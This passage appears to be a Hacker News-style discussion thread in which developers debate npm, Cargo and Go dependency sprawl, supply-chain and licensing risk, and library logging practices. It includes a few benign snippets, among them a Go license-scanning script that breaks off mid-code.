Several people have tried the "blessed crates pack" over the years, but they never gained traction, so people stopped working on them.

It's unfortunate that Rust is so tied to cargo, and unfortunate that cargo insists on allowing multiple versions of a dependency. If you point out that cargo is poorly designed everyone just yells and you and says you don't understand.

Only incompatible versions though — Rust dedups dependencies up to semver compatibility.

I think that's the right balance. clap 3 is and should be treated as a totally different package from clap 2.


It's not as bad as cabal back in the day.

Nonetheless I have run into the diamond dependency problem in practice. Their solution is unprincipled and there's no way to turn off the default behavior.


Do you mean passing a struct from e.g. clap 2 into clap 3? Yeah that won't work directly, nor should it in my opinion. If it is frequently required, projects can and should provide a compatibility layer which does any necessary conversions.

> Do you mean passing a struct from e.g. clap 2 into clap 3? Yeah that won't work directly, nor should it in my opinion.

I agree! But it shouldn't fail at compile time with a vexing error message. It should fail to resolve dependencies when calculating a build plan.


That would seem to completely disallow any compatibility layers, which seems like a bad outcome. Unless you had some sort of solution in mind for that?

I agree that the error message sucks, for what it's worth.


Can you elaborate on the design flaws that you perceive in Cargo?

The biggest flaw is that it makes taking new dependencies easy. I would prefer that it be hard, like in C++, so people think before doing it.

The second biggest flaw is that it couples package management to a programming language, despite those being almost completely unrelated concerns.


> The second biggest flaw is that it couples package management to a programming language, despite those being almost completely unrelated concerns.

Yes it's frustrating. I wish it was more decoupled, maybe with package standards like Haskell tried to do with Cabal.

It makes it hard to use Rust as a drop-in replacement for C. I can add a few C files to a Haskell project without much problem, but most rust code goes via cargo.


Yeah, my back-end is in Go, so being able to write the front end in Go as a simple cross-compile would be great - if it were that simple.

We're a long way from it being that simple. There are "hello world" examples, but nothing close to a working GUI in Go-WASM yet.

I'd love a clone of Vue in Go-WASM. Just saying, if anyone out there wants to give it a try ;)


hmm, I always assumed it's a single "heeby-jeeby" and therefore multiple "heeby-jeebies", because that's how English mostly does singular/plural.

But the repetition in "heebie-jeebies" looks more appealing. Even if grammatically unlikely.

I'm confused now.

Is "heebie-jeebies" intrinsically plural (like "sheep"), and therefore the pluralisation doesn't matter?

Is there even such a thing as a single "heeby-jeeby"?


I can confidently state that I have never sighted a lone heeby-jeeby in the wild.

Heebie-jeebies are best thought of as an affliction, like hives or bedbugs, characterized by shuddering and head-ducking.

My guess is it started as a euphemism for hebephrenia, an obsolete affliction associated with youthful anxiety.


Seconded. Heebie-jeebies are uncountable.

I'll go with the consensus opinion, then. "Heebie-jeebies" it is :)

The dictionaries credit a comic strip "Barney Google" with coining the expression.

No saying whether that is really where the New Evil Empire got its name.


Because even in 2020, even in "secure/financial apps", most programmers have security and license legality as a secondary (or even fourth-level) concern; they just want to "make something cool".

They pay lip service to it being secure and/or license compliant.


I would argue the reason developers don’t have concerns around licensing is partly due to lack of knowledge around the differences between licenses at a fundamental level and partly due to a “why should I care?” mentality at least at a subconscious level, if not higher.

I got a taste of it yet again this past weekend when I commented here on HN about GPL and AGPL being licenses that corporations often have concerns with.


I find it’s the opposite - people with limited understanding of licensing (and IP law in general) often have the most concerns, and misapprehensions.

> it appears that no-one takes this threat seriously, not even in secure/financial apps.

I think that's pretty standard for our industry, even outside the often comically lazy world of JS.


What are you using instead of Webpack? I have a very old personal project still using Webpack 2 and would love a simpler alternative that isn’t just downloading library dist files and checking them in to my project repo. I don’t even need babel or minification or any of that, just simple dependency version management and fetching.

I switched to Rollup for a project and am liking it so far; it also has fewer dependencies.

Here's a comparison of popular bundlers using a visualization tool I found online:

Webpack - https://npm.anvaka.com/#/view/2d/webpack

Parcel - https://npm.anvaka.com/#/view/2d/parcel

Rollup - https://npm.anvaka.com/#/view/2d/rollup

Granted this only covers the initial package for each of these, there are usually a bunch of extra plugins or cli packages that you'll need to work with each of these but I also found the dependency tree of each of the added Rollup plugins to be less than the other 2.

here's rollup-plugin-babel: https://npm.anvaka.com/#/view/2d/rollup-plugin-babel


I'm wedging together Vue components by abusing the Go templating engine at the moment.

But it's not satisfactory because I can't unit test my components properly, or minify/obfuscate properly.

I'm looking at browserify to help with that, but that's going to break my whole build system so I need to find the appropriate time to do that.

Or there's Elm... I keep looking at Elm and wondering if that would solve a lot of these problems...


Rollup looks like it would fit my needs perfectly. Thank you!

I don't think anyone thinks it's perfectly fine (well, maybe newer people in the industry). I just don't think anyone sees a viable alternative.

By adopting any semblance of a modern front-end stack, you're going to be pulling in a huge dependency tree. So, your choices are:

A) Don't do modern front-end development. This, despite being very popular with the HN crowd, is a challenging option. Losing the power of popular frameworks makes it difficult to recruit new developers, slows down developer velocity, and can cause tech debt to accrue more quickly.

B) Validate every dependency. For a skilled security reviewer, this may be possible. For an average developer however, reviewing thousands of dependencies is unlikely to be a good use of time. There are some improvements, automated tools that can be run, but the unfortunate reality is that the NPM attack surface is massive and I don't know of any techniques for producing any truly reliable security assessment.

C) Depend only on packages that you trust and trust them to validate their dependencies. Obviously, if this transitive trust breaks down at any layer then a vulnerability is introduced.

In practice, I've only ever seen individuals and companies do C. I think if there was some tooling around B, that would be the best option. I see a lot of room for disruption here - if there was a way to assign trust to a dependency and then a package-manager level construct that would only allow trusted dependencies to be installed, that might work.

I think the ship has sailed on A.


"Sure I might be running unreviewed code from dozens if not hundreds of unknown entities on my and my users devices, but it's important not to get caught violating a license !"

I've been involved with software development for over 20 years in various capacities, and the npm culture is absolutely the worst in terms of irresponsibility and could be effectively used to argue for the need of regulation of the software industry.


I'm not a web dev, not a JavaScript fan, but out of pure curiosity I've been playing with the idea of doing my next side project in node, just to get an idea of what modern Js feels like.

But the whole dependency hell, left-pad and the like are a real turnoff. So what I'd probably end up with is coding in pure JS without a package manager or "build system". Basically like you did PHP in the 90s. The question is whether I'd end up with anything remotely sane (already assuming it doesn't involve any crypto or anything similarly complex).


Modern JS is TypeScript.

Also Yarn is very handy. (Fast, simple, correct.)

If you need leftPad, maybe just "vendor" it manually.


Modern JS is the current ECMAScript standard. Typescript is not "modern JS", any more than Coffeescript was, any more than the compile-to-js language that will probably replace it in a week.

You're confusing the tool for the language the tool operates on, akin to claiming modern C++ is Visual Studio.


One thousand yes to this!

CoffeeScript was obviously always a fad. It basically traded legibility for ergonomics, adding nothing of particular value to maintainability and longevity.

TypeScript otoh is just ES with types. It moves in the completely opposite direction, adding just enough syntax to get a proper type system in place (a pretty good one to boot).

If anything, I would expect its syntax additions to be adopted into the standard and directly supported by runtimes, despite static typing not being that useful for interpreters.

Unless runtimes completely phase out ES and focus on WASM. (But that will take decades, so it's not really an either/or thing.)


Not using TS means leaving a lot of useful tools on the floor.

The ECMAScript standardization process is invaluable; after all, TS builds upon it. But TS provides a saner subset (and adds a very productive type system); without that I wouldn't touch "modern" JS even with a stick.


What do you mean with TS provides a subset of JS? TS is actually a superset of JS.

Quoting the TypeScript website:

> TypeScript is a typed superset of JavaScript that compiles to plain JavaScript.

https://www.typescriptlang.org/


JS the good parts + types.

My point was that TypeScript includes ALL of JS (the good and the bad parts).

There is not a single feature from JavaScript that TypeScript removes.


I tried vanilla JS three years ago. It got so tedious after just one page that I decided to try and use Elm instead. I have not regretted it once. In contrast to the hacky Npm ecosystem, Elm feels like I'm working with somebody who values my mental sanity a great deal.

It's slowly expanding, but JS has an anemic standard library. The Node platform adds a little, but you're still miles away from a typical standard library like Java's or Python's.

If you want to have 0 dependencies, you will have to write a lot of code to do things that would just be a line or two in most other languages.


I have long hoped Node.js would get a "standard library" of its own

The problem is not the anemic standard library. The problem is the lack of a commonly accepted set of libraries. Java is not so good either: you can't even copy one stream to another in Java 8. There's no built-in DI. There's no built-in ORM. Even the built-in logging is so bad that everyone uses something different. Hell, no built-in JSON in 2019. But there's a set of community-adopted libraries and everyone's using them. You need more utility methods? There's Guava (and, sometimes, Apache Commons). There's no left-pad library. You need DI? There's Spring. You need an ORM? There's Hibernate. You need logging? Well, there's some competition between Logback and Log4j and that's about it. And even that competition has plenty of adapters, which allows you to write library code that works fine with both.

So the JS community should throw left-pad out the window and declare underscore.js the library of choice, so every other library will depend on it, and that's about it.


It is certainly possible to do JS development in a more controlled way.

My advice is to avoid most of the JS build tools (e.g. Grunt, Gulp) by using npm scripts (basically shell commands defined in `package.json`) to trigger build actions, or to start smaller, more specialised tools. At least then you will understand how your build works and won't have an extra layer of buggy plugins screwing things up.

Also being conservative and critical of the dependencies you take on is a great idea. Many smaller dependencies are not worth it. Bigger popular libraries like lodash are often a better deal. Unfortunately this micro-module philosophy and "publish random trash to npmjs.com" attitude has created a huge amount of crud packages.

I've had success organising a bigger project into multiple node packages inside the same git repository and using yarn's workspaces feature to tie it all together. I avoid the complexity of publishing those (private) packages on npmjs.com; yarn's workspaces make it possible for my main app to find its (internal) package dependencies in the same git repo.


I have a project with a build system that is basically cat src/js/* > dist/bundle.js , it's refreshing when you have to deal with setting up webpack at work.

No, you are basically right, but the number of nodes in the dependency tree doesn't mean you really have to review all of them. Usually you end up with a big basket of actual dependent projects, plus several versions of some of them (which is what leads to the big explosion in the number of nodes in the dep tree).

Naturally it should be easy to specify a whitelist of licenses. (Of course then one has to decide whether to trust the package.json-s.)

That said, security review is hard for any ecosystem. Go probably has inherent advantages compared to the JS ecosystem, simply by virtue of being younger, having a real standard library, being more focused (no browser vs nodeJS issues) etc.

PS: there are projects that aim to do collaborative audit/review for Rust ( https://github.com/crev-dev/cargo-crev ) there should be something like that for the JS world. also there's the NPM "report vulnerability" feature.


Dependencies are cattle, not pets. There's nothing wrong with having zillions of them; what you need is good tools to manage them in bulk.

In the JVM ecosystem, projects are only allowed in the Maven Central repository if they have their license documented in a machine readable fashion there; it's then trivial to check what licenses you're depending on (and there are several plugins available for doing so). I'm amazed other ecosystems don't offer the same.


This protects you against licences you don't expect, but not against malicious or subverted dependencies.

Since a dependency can generally do anything your application has privileges for, widely depended-on libraries are an attractive target. A cattle approach means more dependencies, and it being easier for new ones to sneak in.


> Dependencies are cattle, not pets.

It depends on your context. Sometimes, dependencies are not pets, but weights on your airplane.


> There's nothing wrong with having zillions of them...

There's nothing wrong until something goes wrong and now you're royally screwed. With a zillion dependencies you are at the mercy of a zillion maintainers, and none of them has any obligation to you. They can break backwards compatibility in patch releases, introduce subtle behavior changes, steer the project in an unexpected direction or abandon it altogether.


I’m a bit torn on this. I have most of my experience in the .NET ecosystem, where dependencies are a lot more manageable. However, if something breaks, you’re screwed a lot harder, because it’s not so easy to replace a large library, and there are very likely fewer well-maintained alternatives than there would be on NPM.

In total, I find it hard to deny how productive the NPM ecosystem can be, despite my philosophical objections to the way the community is run. Am I crazy here?


You aren't alone in this. The Node/NPM/JS scene is churning out code and innovations like there's no tomorrow, that's something to admire.

What I feel they are missing is a community process to consolidate things. You don't need three generations of ten incompatible solutions for a given problem - after some iterations, things should consolidate into one or two more or less standardized libs that don't break existing code at every damn point release.


> You aren't alone in this. The Node/NPM/JS scene is churning out code and innovations like there's no tomorrow, that's something to admire.

I don't find churning out code admirable, and I also don't think I've seen any true innovation come out of the NPM scene (bar innovation in the browser/JS space itself, which I think isn't a good measure as it's mostly just working around limitations that shouldn't be there in the first place).


That goes in the direction of my thinking. I am concerned about transitive security issues. It is impossible to check node dependencies into version control (size/binaries). They have a lock file to pin versions, but dependencies that are downloaded on each build are not reproducible from my point of view. With Go, it's easy to vendor and check them in, and it's also straightforward to review them. There have been examples of targeted attacks using npm packages and that is something I am very concerned about.

People move billions with a node.js application we develop and the company will eventually be liable if the system is compromised through a targeted attack.

On a different note, I think the ecosystem moves too fast; packages and versions are getting deprecated and new ones released constantly. I have the feeling that the whole ecosystem is targeted towards building small MVP apps, not towards something a long-term business relies on. Maybe I am too harsh here, but that is a frustration that has been growing for years now. I am happy to be proven wrong.


Not a huge fan of Node or anything, but npm lock files do pin to a hash. Also, in the commercial world you're going to be pulling through Nexus or some other cache to reduce bandwidth use and developer downtime.
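
For example, a package-lock.json entry pins both the resolved tarball and an integrity hash (digest shortened here for illustration):

    "left-pad": {
      "version": "1.3.0",
      "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
      "integrity": "sha512-<base64 digest>"
    }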

Are there other reproducibility concerns I should be worrying about? Are you thinking of npm modules with native code, or ones that (this does happen!) actively pull other stuff during the build? Most of those do their own pinning, but I agree the whole thing is messy.


In that case the npm ecosystem has some serious bovine spongiform encephalopathy risks to manage

> There's nothing wrong with having zillions of them

That is a scary point of view. We have forgotten that there is no such thing as a zero-cost abstraction, apparently, and shovelware developers are now employed by enterprises and write enterprise software...

CPUs aren't getting faster. Software is getting slower a LOT faster than hardware is getting faster, these days, and people are still apparently perfectly fine with adding dependency upon dependency upon abstraction upon abstraction and it's adding up extremely quickly.

A good first step to addressing this is to favor a small copy & paste operation over a small dependency. Lots of people will shriek at the idea of this, but I promise you, all the problems with copying and pasting code are nowhere near as severe as all the problems with dependencies. Working to avoid problems you don't have results in creating problems that you definitely do have.


The comment you're replying to makes references to the JVM, which is not surprising given what I've seen in the Enterprise Java culture.

> Dependencies are cattle...

... Which also happen to keep their own cattle that you're still responsible for.

It's not so bad in languages with solid standard libraries. In Python projects I might have 20 direct deps, ~50 indirect.

In a real JS project I'm building, I have 17 direct, 3829 indirect. The JS standard library is so damned thin that everything pulls in some random version of the kitchen sink.

    yarn list | sed -E 's/.*- //' | sort -u | wc -l  # minus 2
In situations like that your job of auditing licenses, updates, sec issues, etc balloons exponentially with each new dependency.

Tooling should absolutely be used, but it still doesn't perform the job of working out whether or not you want to upgrade a component, or whether or not you're likely to have suffered a security breach, or how to report on how well audited your dependencies are.


"Servers are cattle, not pets" relies on the servers being substantially identical, cloned like bananas from a single source where each is as good as the other.

Dependencies are, if they are to be useful at all, all different. Dependencies are suppliers, in the business sense. Having lots of dependencies loaded at runtime is like a modern just-in-time giant supply chain; it lets you take advantage of efficiencies in exchange for being more brittle.

Or they are like BOM items on a circuit board. Part of the original drive to "componentise" software came from people experienced in electronic engineering; you don't have to reinvent the transistor, you just buy them at a cost of a few dollars for a reel of thousands. But experienced designers will still try to:

- choose more-common components wherever possible

- ensure there are multiple sources for a component

- reduce the overall number of BOM lines, which reduces supply risk and inventory cost

The software world would go completely bananas if the cost for dependencies was not exactly zero. Imagine having to license left-pad.


> Dependencies are cattle, not pets.

That doesn't make any sense. That analogy works for mostly-identical computers, where if your software won't run on one computer you can just use another mostly-identical computer.

Almost by definition dependencies are not interchangeable. You can't replace a routine to pad strings with a routine that is a web server. Or a matrix multiplier. Even dependencies that do the same overall job almost never have the same API. Heck, even the same dependency often ends up with a different incompatible API over time as versions change.

> There's nothing wrong with having zillions of them; what you need is good tools to manage them in bulk.

Every added dependency is a risk. Each unintentional vulnerability in each dependency increases the number of vulnerabilities that might be exploitable in your system. And that's just the unintentional vulnerabilities.

Practically all systems provide no useful sandboxing between dependencies, so if any one of your transitive dependencies is malicious, then your entire system is malicious.

Every new dependency also brings in potential license issues, per this article. I think it's unacceptable to have a scarefest about the AGPL, GPL, or LGPL; for a vast number of applications those licenses are just fine. The bigger risk is software that has no license at all, which is a legal risk for any project that uses it until governments change international copyright treaties (which is not likely any time soon). But it's certainly true that various licenses are not acceptable for certain situations, and every new dependency increases the risk of licensing problems.

Having no dependencies is absurd; it's uneconomic to build everything from scratch. But every time you add a dependency you need to think about the trade-off; it is sometimes wise to not reuse something.


Does Maven Central also require machine-checkable proofs of security?

No (and I don't think any code repository does or could; what would a "proof of security" actually prove?). It does require machine-checkable signing of all releases.

The opposite of this is true.

> what you need is good tools to manage them in bulk

How do you manage reputation and relationships in bulk? There are transactional costs here. Dependencies created by maintainers with impeccable reputations are a much smaller risk than arbitrary dependencies created by arbitrary maintainers.


You require releases to be signed by maintainers (again, something maven central enforces and other repositories ought to), and then you have a notion of maintainer identity and can decide which you trust (again something that plugins let you do). If there are still too many maintainers then you can use the GPG web of trust approach, as e.g. Debian does, and see which maintainers are part of trusted organisations.

Seems like negative comments about npm are getting shadowbanned here, so let's try again: npm-based software engineering culture is utterly irresponsible and should be viewed as a liability for both a company and its users.

The npm dependency model is a nightmare. All the more shameful given that it's backed by a for-profit entity that charges its users.

Please don't post vague flame bait.

My biggest issue with the massive dependencies is not licensing or security. Both are important, but there is an even bigger block.

My biggest issue with things in the node ecosystem is breakage, especially React libraries. I was following a NetNinja tutorial series on YouTube. I had to use a Firebase-Redux library for a combined React/Redux/Firebase series. There was a security vulnerability in something down the stack only a few months after the tutorial was out. So to use the updated version I had to use the beta version of a Firebase library, which broke the tutorial code despite the library change being a point release like 1.4.0-beta2. Either 1.3.0 to 1.4.0 or 1.2.0 to 1.4.0 would be considered a breaking release for this particular dev.

We have a large group of dependencies chained upon each other with maintainers that have different support commitments and styles. React might be the de facto JS system, but it relies on a large system of these 3rd party packages to do deeper functionality which can so easily break things. I already had to peg React itself to an older version to use this tutorial when it was months old.

I realized at this point how much of a pain it would be to maintain this code in my portfolio if I did something with it. Let alone a paid product. I stopped learning React at this point (or at least learning React+Redux+Firebase).

Ruby sorta has this issue too, but it feels like the Node ecosystem is much more accelerated. The Rails framework dominates the gem ecosystem so much that gems usually tie breaking changes to the version of Rails they support. So gems often will not update, or will warn of breaking changes, based on the Rails version or ActiveRecord, which follows Rails versioning. This makes gem dependencies much more manageable.

The node ecosystem does not have a large dominating framework like Rails. Even if you considered React that framework, Facebook breaks it whenever they please: 16.4, which sounds like a minor version update, breaks things. Meanwhile Rails 4.2 was supported for 4 years, and jQuery might go years before it breaks support.


Rust is on this path as well: the small standard library pretty much forces people into using a ton of tiny dependencies. Compiling a Rust project is exactly like using npm and seeing a never-ending list of deps.

It is also difficult to know which dependencies have unsafe code. There's good discussion about it on reddit: https://www.reddit.com/r/rust/comments/ekpa3i/is_anyone_conc...

The underlying problem is the lack of curation. Micro-dependencies that are widely used and have been reviewed for quality should be promoted to a group of standard packages. They'd still be dependencies like any other but they'd be officially maintained and installed by default.

Another problem with npm: every package gets its own copy of its dependencies. Not sure if Rust does that.


Cargo de-duplicates packages as much as possible, and only includes multiple copies if there are multiple incompatible versions required.

> every package gets its own copy of its dependencies. Not sure if Rust does that.

It does something halfway in between, which is still a security liability.


IMO the main problem with Rust is that it's tied to cargo, which tries to link in multiple versions of the same crate.

I don't think the NPM ecosystem is in a great security position, but the pushback I'd make here is that you should be reviewing your Go dependencies as well.

If you're looking at the NPM ecosystem and saying, "the number of dependencies is problematic because it takes a long time to review them", I agree with you. If you're looking at the Go ecosystem and saying, "there are fewer dependencies, so I don't need to review them", then that's a security antipattern.

The better way to phrase this to your team is that you need to review dependencies, period. The NPM ecosystem isn't problematic because it introduces a new requirement to review dependencies, it's problematic because reviewing dependencies is harder. You can use NPM all you want for security-sensitive code. You just have to spend the extra time to review dependencies, which means bringing in new dependencies will be much slower than in a shallower ecosystem like Go's.

That's the point of OP's article. You can't skip reviewing dependencies in any ecosystem, in part because all of our ecosystems across the board have crap sandboxing and permissions, but also because of license issues and quality issues like the author found. There is no shortcut for that, whether you're using Ruby, Go, Python, whatever. You have to review your dependencies.


"the number of dependencies is problematic because it takes a long time to review them"

The dependencies themselves are generally smaller and more self-contained. Arguably it is easier to review since the side effects and cross-module behaviors are much more pronounced (it's generally deemed a "bad thing" by the community for modules to make unnecessary global actions)


I read the GP post as saying that having fewer dependencies makes reviewing them easier, not that one need not review them?

My point being that "NPM is bad for security" is probably the wrong take to convince a software team to avoid the ecosystem.

Instead, phrase it as, "well obviously we need to review our dependencies, so why use an ecosystem where that's hard?" Don't phrase it as a security problem, phrase it as a development time and overhead problem.

Or better yet, let your team use NPM as long as they review the dependencies, and if your dependency tree is really a problem, your team will naturally become annoyed by the extra work and will avoid large dependencies on their own without a lot of extra prompting.


> Nobody except me seems to see a problem there, despite me being able to point out specific security incidents.

The npm model is a shitshow (multiple versions of one dependency). People defend it for obviously self-interested or lazy reasons.


>Nobody except me seems to see a problem there, despite me being able to point out specific security incidents.

This seems to apply to security in general. Security these days is doing the minimum amount needed to check some boxes saying you are now secure. I suspect a lot of this is driven by incentives. There are few negatives for an individual in choosing bad security over good security, and the costs of good security mean less of the 'good stuff' being developed, which results in worse reviews and less prestige. And if people are hacked, the blame is primarily placed on the hackers, with little danger to the developers and often even less danger to the company (they might have to spend 5% of the budget they saved on PR to repair their image).

I'm not sure how to fix the issue with prioritization of security. My first guess would be to change the incentives for companies so they bear the liability in identity theft instead of the user (the very concept of identity theft is a trick to blame the end consumer instead of either the business leaking data or the business giving away money without verifying whether data is accurate).


They both have flaws: NPM due to the cascading mass of transitive dependencies; Go (historically) due to pulling dependencies from the master branch of a repo. All of those can change from underneath you.

In any case you can’t avoid proper auditing and pen-testing. Even if your app code is rock solid, it doesn’t mean your infrastructure is safe. Or even your office building or the data centre serving the code. Or your employees and their credentials.

All it takes is a decision to use mongodb or redis without auth and to expose the ports to the internet, and the most secure runtime in the world won’t save you then.

Or a bit of social engineering so the attacker is making perfectly legit requests in your perfectly secured app.


I am doing a similar analysis within my company. While I usually don't dig that deep into asking why something is AGPL or GPL, the amount of carelessly managed dependency trees within the NPM ecosystem is astonishing. It is not only about licenses, but also code quality and vulnerabilities.

I came to exactly the same conclusion as the author: focus on platforms where there is a reasonable standard library. That is .NET in my case and Go in his case. These produce much (much) cleaner dependency trees.

I ended up writing software to analyze the dependency trees' licenses for our browser-based products.


> The bulk of my trust is consolidated in the Go project, and thanks to their stellar reputation and solid operating procedures, I don't feel a need to review the source code of the Go compiler and standard libraries.

Well... I have reviewed the Go runtime, after I ran into a bug in it... And that's one of the reasons I no longer use Go unless forced to. That thing is ugly under the covers. There is seriously quite a bit of insanity and poor design going on, e.g. when they did the ARM port they had to make a ton of changes to data structures/functions to include the link register, because they didn't or couldn't abstract out architecture specific tidbits like that. Also, the whole C interop stuff is nuts with a ridiculous call chain and several stack switches every time you call to or from C code (this is where I found the bug).

Not saying people shouldn't use it, but I wouldn't hold the deep guts of Go up as an example of stellar development practices. Maybe all the stdlib stuff on top is prettier, but the runtime sure isn't.


> That thing is ugly under the covers.

Was the code you looked at in Go 1.5 and above? Is it cleaner in 1.4? They used automated tools to convert the C code into Go for 1.5.


They were halfway through the process when I made my contribution, and in fact I had to rewrite it in Go. The Go version was just a straight conversion; being Go didn't make it inherently cleaner.

I think his point is that it stands to reason that machine-converted C-to-Go code may be pretty ugly. Maybe it was better when it was clean, Plan-9-style C? Maybe it is better now, after some number of years of cleanup?

So what would you use instead?

I ran into a speed issue last year messing around with Go RSA keys. Turns out it's an open bug. Even though fixes have been made (see links in the thread), it's not a global fix and Go ciphers can be abysmally slow.

https://github.com/golang/go/issues/20058

The recommended fix is to use a library like this one. However, that means your containers blow up with complicated dependency trees so it's not really a good solution for a distributed container architecture (eg Kubernetes).

https://github.com/ncw/gmp

I love working with Go because of its simple binaries and small containers, but there are some things that it just does not do well.
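
For context, the slow path is just the standard-library keygen call, which bottoms out in math/big; here's a rough sketch of the kind of timing test involved (the 4096-bit size is only for illustration):

    package main

    import (
        "crypto/rand"
        "crypto/rsa"
        "fmt"
        "time"
    )

    func main() {
        start := time.Now()
        // GenerateKey spends most of its time in math/big primitives,
        // which is where the linked issue points.
        key, err := rsa.GenerateKey(rand.Reader, 4096)
        if err != nil {
            panic(err)
        }
        fmt.Printf("generated %d-bit key in %s\n", key.N.BitLen(), time.Since(start))
    }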


I don't know if using GMP for RSA is a good idea. I am pretty sure that GMP would open you up to side-channel attacks due to its operations not being constant time.

GMP has constant time functions for the relevant primitives you'd need to implement RSA (notably, constant-time/space modular power functionality). You'll probably still fuck it up completely anyway if you're doing it yourself, but not because of that.

I abandoned the project because I couldn't find a reasonable solution using standard Go libs that worked in a reasonable timeframe. The bottleneck is this function.

math/big.addMulVVW

There was some work on it recently.

https://go-review.googlesource.com/q/addMulVVW

But I feel like this issue might have been ignored.

https://go-review.googlesource.com/c/go/+/164966

It might be addressed in Go 1.14 (although it's been marked as Backlog since I last looked at that issue).

https://github.com/golang/go/issues/32492

Point being that Go, as the OP of this thread suggests, has some issues. This is, to me, a critical flaw preventing my teams from using Go as a primary web language. It is both consistently faster and more consistently timed to make an external call to, say, gpg2 to generate a key than it is to use the openpgp lib that relies on math/big. That's nuts.


The standard library is generally very well designed and has good practices with the caveat that you should stay away from encoding/*, there be dragons.

The problem is reviewing dependencies is labor-intensive, thus expensive. The economics would justify that being a paid service, like UL/TÜV certification for electronics, but most companies don't actually care enough about security to pay for such a thing.

It's also very important to watch for changes in your dependencies, as they can be quite dynamic. A single review too early or too late in the development process may have misleading results. Watching for every commit is too time-consuming, so watching for releases is a bit easier, especially if you use something like https://newreleases.io or other similar sites.

Slightly related: I have created this useful tool called vendorlicenses that allows you to check and concatenate licenses on Go programs (to give credit on a CLI "legal" command).

It will only work if you are vendoring your packages though (and you should!).

https://github.com/henvic/vendorlicenses


Okay, great advice.

> Aside: this is why I don't like to accept pull requests that move code around. Even if the new code organization is better, it's usually not worth the time it takes to ensure the pull request isn't doing anything extra.

This sounds like a solvable problem no one has bothered to solve. We need an analogue of diff highlighting for move-around changes, ideally one that decomposes a changeset into the coarsest block partition such that the changes boil down to a permutation of the blocks.

Something similar should be done for merge commits, which at the moment are completely undebuggable.


For changes that are a pure file rename 'git mv' tracks those pretty cleanly. Anything beyond that... I don't know of any good tooling either.

git mv doesn't actually do anything special to track moves, so it can't figure out anything that's non-trivial.

Mercurial goes a bit further by tracking copies, so if you split a file in two, a diff viewer will show there is no added code (but a lot of deletions). https://stackoverflow.com/a/4156146/539465

The NPM ecosystem has quite a similar situation.

A lot of popular packages are being used in complete contravention of their license terms, and people care not at all that their dependency chains pull in quite restrictive licenses.


> It started off poorly when I noticed some Brown M&M's: despite being a library, it was logging messages to stdout

In many language ecosystems, logging to stdout tends to be the right thing to do in a lib as it does not impose any specific choice of logging implementation.

One can always recapture stdout and route it through one's logging solution of choice; doing something analogous with an extraneous logging library can be harder, if not infeasible.

Are things different in Go land?


In what language or environment would recapturing and routing stdout be a desirable solution? Seeing that without a really good explanation would concern me. That's a global hack with fun side effects that can lead to very confusing bugs. Also, you would lose which library is which log if you have to do this for more than one library.

In Go, I would assume that a library that needs to log would do one or more of the following: a) offer the ability to disable logging, b) offer overriding the output that it uses for logging, probably with an io.Writer interface or something, c) accept a log.Logger or offer an interface that something like log.Logger meets. Ideally it would offer an interface that supports some key-value metadata to be able to produce nicely structured logs with formatting independent of the library.
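
A minimal sketch of option (c), assuming a hypothetical library package: the library accepts a small interface (which *log.Logger already satisfies) and discards output by default, so the application decides where logs go:

    package mylib

    import (
        "io/ioutil"
        "log"
    )

    // Logger is the minimal interface the library needs; *log.Logger satisfies it.
    type Logger interface {
        Printf(format string, v ...interface{})
    }

    type Client struct {
        log Logger
    }

    // NewClient defaults to discarding log output; callers can pass
    // log.New(os.Stderr, "mylib: ", log.LstdFlags) or their own adapter.
    func NewClient(logger Logger) *Client {
        if logger == nil {
            logger = log.New(ioutil.Discard, "", 0)
        }
        return &Client{log: logger}
    }

    func (c *Client) Do() {
        c.log.Printf("doing the thing")
    }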


Logging to stdout prevents any sort of systematic parsing or handling of stack traces, package names, or error levels, because people are going to dump whatever shit they personally find most useful onto stdout and everyone's going to use a different format. That is a far, far more "analog" solution than using any logging API... or even multiple ad-hoc logging APIs.

The idiomatic solution is to have a standardized facade like SLF4J and then behind the scenes the "end user" (final developer writing the application) can choose their own logging backend to drive the facade.

The slightly less idiomatic way is that everybody does their own thing and then you use bridge libraries to hijack all of the various logging APIs and redirect them through SLF4J or through your logging backend of choice.


As a library, if you just have to avoid logging frameworks, at least log to `stderr` so you don't break tools that parse output.

Johnny-come-lately here, but is that true of the AGPL, that merely linking to AGPL code infects your code? No modification to the AGPL code is needed to trigger the clause?

What is the point of having a license like that? Trolling?


Yes, that is generally how copyleft (GPL) software works. Linking against it confers a requirement that your source also be distributed under a compatible license. This is why it's called a "viral" license.

AGPL was intended to close the SaaS gap in copyleft software. Essentially, prior copyleft provisions don't kick in if you never distribute the software itself, so if you only offer network interaction with the software you have no duty to redistribute.

AGPL is intended to restore the freedom of end users to have access to the source of the software they interact with, even if it lives on someone else's computer. As with all copyleft software, it does this by restricting the rights of the developers of the software (to keep their source proprietary).

As always, it is the old philosophical split between MIT/BSD style licenses and GPL style licenses. MIT/BSD provide you with complete freedom, including the freedom to use that library and keep your source closed. GPL is intended to prevent that and to build a common base of software on which further things can be built.

(There is also the Lesser GPL (LGPL), which only kicks in for modifications to the library itself. So if you write something that uses an LGPL library, you don't have to give away the source for the larger program as a whole, just the LGPL library and any modifications you made to it. This essentially removes the "viral" copyleft provisions.)


On the licensing front, one thing that has really helped me is adding a script to my build / CI process that scans every package I'm dependent on for a LICENSE / COPYING / etc. file and then runs through a set of dumb fingerprints to match on different licenses for a combined whitelist / blacklist approach. Packages with no recognized license file or license are rejected. Then it spits the licences out into a map[string]string in a file where the Go package maps to the license string which gets served up on its own HTTPS endpoint to keep in compliance with copyright notice requirements.

In case it's useful to anyone else, here's an older copy of it: https://gist.github.com/robmccoll/240317eceb73e3f4e29ea662e3...
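
Not the linked gist, but a rough sketch of the general shape of such a check, assuming a vendored tree and a hand-rolled fingerprint whitelist (it omits the "no license file at all" case and the HTTPS endpoint):

    package main

    import (
        "fmt"
        "io/ioutil"
        "os"
        "path/filepath"
        "strings"
    )

    // Crude fingerprints: phrases that identify an allowed license family.
    var allowed = map[string]string{
        "Permission is hereby granted, free of charge": "MIT",
        "Apache License":                               "Apache-2.0",
        "Redistribution and use in source and binary":  "BSD",
    }

    func main() {
        licenses := map[string]string{} // package dir -> license text
        err := filepath.Walk("vendor", func(path string, info os.FileInfo, err error) error {
            if err != nil || info.IsDir() {
                return err
            }
            name := strings.ToUpper(info.Name())
            if !strings.HasPrefix(name, "LICENSE") && !strings.HasPrefix(name, "COPYING") {
                return nil
            }
            text, err := ioutil.ReadFile(path)
            if err != nil {
                return err
            }
            for fingerprint := range allowed {
                if strings.Contains(string(text), fingerprint) {
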